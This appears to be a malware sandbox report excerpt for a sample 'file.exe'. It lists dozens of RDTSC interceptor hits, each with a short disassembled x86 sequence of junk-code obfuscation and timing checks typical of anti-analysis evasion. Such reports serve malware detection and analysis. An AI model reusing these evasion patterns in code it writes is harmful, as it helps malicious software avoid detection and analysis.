Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1065719 second address: 106577D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jmp 00007F08ED2385F8h 0x0000000c pop edi 0x0000000d popad 0x0000000e mov dword ptr [esp], eax 0x00000011 pushad 0x00000012 mov ebx, 59BE442Bh 0x00000017 mov dword ptr [ebp+122D2B29h], ebx 0x0000001d popad 0x0000001e push 00000000h 0x00000020 push 00000000h 0x00000022 push ebx 0x00000023 call 00007F08ED2385E8h 0x00000028 pop ebx 0x00000029 mov dword ptr [esp+04h], ebx 0x0000002d add dword ptr [esp+04h], 00000014h 0x00000035 inc ebx 0x00000036 push ebx 0x00000037 ret 0x00000038 pop ebx 0x00000039 ret 0x0000003a or edx, dword ptr [ebp+122D3CF5h] 0x00000040 push DE569BE7h 0x00000045 push eax 0x00000046 push edx 0x00000047 push edi 0x00000048 jo 00007F08ED2385E6h 0x0000004e pop edi 0x0000004f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 106577D second address: 1065783 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1065783 second address: 1065787 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1065787 second address: 1065812 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 add dword ptr [esp], 21A96499h 0x0000000f or dword ptr [ebp+122D2ADEh], eax 0x00000015 jnl 00007F08ED2F2E8Bh 0x0000001b push 00000003h 0x0000001d mov edi, dword ptr [ebp+122D3AD9h] 0x00000023 or edi, dword ptr [ebp+122D2C61h] 0x00000029 push 00000000h 0x0000002b jg 00007F08ED2F2E8Ch 0x00000031 mov dword ptr [ebp+122D2ADEh], eax 0x00000037 push 00000003h 0x00000039 push 00000000h 0x0000003b push edi 0x0000003c call 00007F08ED2F2E88h 0x00000041 pop edi 0x00000042 mov dword ptr [esp+04h], edi 0x00000046 add dword ptr [esp+04h], 00000019h 0x0000004e inc edi 0x0000004f push edi 0x00000050 ret 0x00000051 pop edi 0x00000052 ret 0x00000053 mov esi, dword ptr [ebp+122D3D35h] 0x00000059 call 00007F08ED2F2E89h 0x0000005e js 00007F08ED2F2E92h 0x00000064 jmp 00007F08ED2F2E8Ch 0x00000069 push eax 0x0000006a push eax 0x0000006b push edx 0x0000006c push ecx 0x0000006d jp 00007F08ED2F2E86h 0x00000073 pop ecx 0x00000074 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1065812 second address: 1065828 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F08ED2385F2h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1065828 second address: 106584B instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F08ED2F2E86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F08ED2F2E91h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 106584B second address: 106585F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F08ED2385F0h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 106585F second address: 1065863 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1065A96 second address: 1065A9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1055E71 second address: 1055E76 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1084EF2 second address: 1084EF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1084EF6 second address: 1084EFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1084EFC second address: 1084F15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 pushad 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push edi 0x0000000c pop edi 0x0000000d ja 00007F08ED2385E6h 0x00000013 popad 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10855DE second address: 108561D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08ED2F2E96h 0x00000007 jmp 00007F08ED2F2E93h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push esi 0x00000010 pop esi 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 popad 0x00000014 push ebx 0x00000015 pushad 0x00000016 popad 0x00000017 pop ebx 0x00000018 push eax 0x00000019 push edx 0x0000001a jg 00007F08ED2F2E86h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1085865 second address: 108588E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push ebx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b pushad 0x0000000c jmp 00007F08ED2385F9h 0x00000011 push eax 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10859EC second address: 10859F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1085B29 second address: 1085B2E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1085B2E second address: 1085B50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F08ED2F2E86h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push edx 0x0000000e push esi 0x0000000f jmp 00007F08ED2F2E91h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1085B50 second address: 1085B5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 jnl 00007F08ED2385E6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1085E2C second address: 1085E32 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1085E32 second address: 1085E38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1079EB9 second address: 1079ED6 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F08ED2F2E90h 0x0000000b pushad 0x0000000c push edx 0x0000000d pop edx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1085F83 second address: 1085F87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1085F87 second address: 1085F91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1086522 second address: 108655C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F08ED2385EDh 0x00000008 jmp 00007F08ED2385F8h 0x0000000d js 00007F08ED2385E6h 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 jng 00007F08ED2385E6h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 108655C second address: 1086573 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F08ED2F2E8Bh 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1086573 second address: 1086582 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F08ED2385E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10866BD second address: 10866C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1086860 second address: 108686E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F08ED2385EAh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 108686E second address: 1086889 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08ED2F2E91h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10869C3 second address: 10869D5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08ED2385EAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10869D5 second address: 10869D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10869D9 second address: 10869E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1079EAF second address: 1079EB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1086D37 second address: 1086D3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1086D3C second address: 1086D66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F08ED2F2E94h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F08ED2F2E8Ch 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 108B26E second address: 108B278 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F08ED2385E6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 108B278 second address: 108B28B instructions: 0x00000000 rdtsc 0x00000002 jno 00007F08ED2F2E86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push edx 0x00000010 push esi 0x00000011 pop esi 0x00000012 pop edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 108B7C2 second address: 108B7C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 108B7C6 second address: 108B7CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 108B7CC second address: 108B7D3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 108A85C second address: 108A865 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 108B8A4 second address: 108B8AE instructions: 0x00000000 rdtsc 0x00000002 je 00007F08ED2385E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 108B8AE second address: 108B8B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 108B8B3 second address: 108B8B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 108B8B9 second address: 108B8D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jmp 00007F08ED2F2E8Ah 0x00000010 push edx 0x00000011 pop edx 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 108B8D1 second address: 108B8D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 108B8D7 second address: 108B8EC instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F08ED2F2E86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push edi 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 108B8EC second address: 108B8F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 108B8F0 second address: 108B90D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 mov eax, dword ptr [eax] 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F08ED2F2E92h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 108B90D second address: 108B913 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 108CB84 second address: 108CB9C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F08ED2F2E92h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 108CB9C second address: 108CBA0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1091302 second address: 1091313 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jnp 00007F08ED2F2E8Ch 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1091313 second address: 109131D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F08ED2385E6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10578D4 second address: 10578E1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jno 00007F08ED2F2E86h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10578E1 second address: 10578EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F08ED2385E6h 0x0000000a popad 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1090755 second address: 109076C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jns 00007F08ED2F2E86h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f ja 00007F08ED2F2E86h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 109076C second address: 1090770 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1090BB0 second address: 1090BB5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1090FE2 second address: 1090FE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10911A7 second address: 10911B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jmp 00007F08ED2F2E8Bh 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10911B9 second address: 10911C3 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F08ED2385F2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10911C3 second address: 10911C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1092EEE second address: 1092EF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1093047 second address: 109304B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1093615 second address: 1093619 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1093619 second address: 109361F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1093ABC second address: 1093ADD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jmp 00007F08ED2385F4h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1093ADD second address: 1093AE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1093AE2 second address: 1093AEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F08ED2385E6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1093AEC second address: 1093AF0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1093B8D second address: 1093B91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1093B91 second address: 1093BB3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007F08ED2F2E88h 0x0000000c popad 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 jmp 00007F08ED2F2E8Ch 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1094165 second address: 109416C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1094668 second address: 10946BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08ED2F2E8Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push edi 0x00000010 call 00007F08ED2F2E88h 0x00000015 pop edi 0x00000016 mov dword ptr [esp+04h], edi 0x0000001a add dword ptr [esp+04h], 00000017h 0x00000022 inc edi 0x00000023 push edi 0x00000024 ret 0x00000025 pop edi 0x00000026 ret 0x00000027 push ecx 0x00000028 mov di, A8B6h 0x0000002c pop edi 0x0000002d push 00000000h 0x0000002f js 00007F08ED2F2E8Bh 0x00000035 and si, 8712h 0x0000003a push 00000000h 0x0000003c mov si, 3548h 0x00000040 xchg eax, ebx 0x00000041 push eax 0x00000042 push edx 0x00000043 pushad 0x00000044 push ecx 0x00000045 pop ecx 0x00000046 pushad 0x00000047 popad 0x00000048 popad 0x00000049 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1096B0E second address: 1096B7E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F08ED2385EEh 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F08ED2385EEh 0x00000011 nop 0x00000012 mov esi, dword ptr [ebp+122D1CB7h] 0x00000018 push 00000000h 0x0000001a mov dword ptr [ebp+122D2D75h], edi 0x00000020 sbb di, 1787h 0x00000025 push 00000000h 0x00000027 push 00000000h 0x00000029 push edx 0x0000002a call 00007F08ED2385E8h 0x0000002f pop edx 0x00000030 mov dword ptr [esp+04h], edx 0x00000034 add dword ptr [esp+04h], 0000001Bh 0x0000003c inc edx 0x0000003d push edx 0x0000003e ret 0x0000003f pop edx 0x00000040 ret 0x00000041 mov esi, dword ptr [ebp+122D3C89h] 0x00000047 push eax 0x00000048 pushad 0x00000049 jne 00007F08ED2385E8h 0x0000004f push eax 0x00000050 push edx 0x00000051 pushad 0x00000052 popad 0x00000053 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10968E4 second address: 10968FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F08ED2F2E95h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10968FD second address: 1096901 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1097412 second address: 1097416 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1099643 second address: 109965E instructions: 0x00000000 rdtsc 0x00000002 jns 00007F08ED2385E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c pop eax 0x0000000d push eax 0x0000000e pop eax 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 pushad 0x00000013 push ebx 0x00000014 pushad 0x00000015 popad 0x00000016 pop ebx 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 109965E second address: 1099662 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1099662 second address: 1099666 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1099666 second address: 10996E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ebp 0x0000000b call 00007F08ED2F2E88h 0x00000010 pop ebp 0x00000011 mov dword ptr [esp+04h], ebp 0x00000015 add dword ptr [esp+04h], 00000014h 0x0000001d inc ebp 0x0000001e push ebp 0x0000001f ret 0x00000020 pop ebp 0x00000021 ret 0x00000022 add dword ptr [ebp+122D2BCBh], ebx 0x00000028 push 00000000h 0x0000002a push 00000000h 0x0000002c push eax 0x0000002d call 00007F08ED2F2E88h 0x00000032 pop eax 0x00000033 mov dword ptr [esp+04h], eax 0x00000037 add dword ptr [esp+04h], 0000001Ah 0x0000003f inc eax 0x00000040 push eax 0x00000041 ret 0x00000042 pop eax 0x00000043 ret 0x00000044 push 00000000h 0x00000046 mov dword ptr [ebp+122D2EC0h], esi 0x0000004c xchg eax, ebx 0x0000004d jc 00007F08ED2F2EA5h 0x00000053 pushad 0x00000054 jnp 00007F08ED2F2E86h 0x0000005a jmp 00007F08ED2F2E97h 0x0000005f popad 0x00000060 push eax 0x00000061 pushad 0x00000062 pushad 0x00000063 push eax 0x00000064 push edx 0x00000065 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10993BF second address: 10993C9 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F08ED2385ECh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 109C8FA second address: 109C8FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
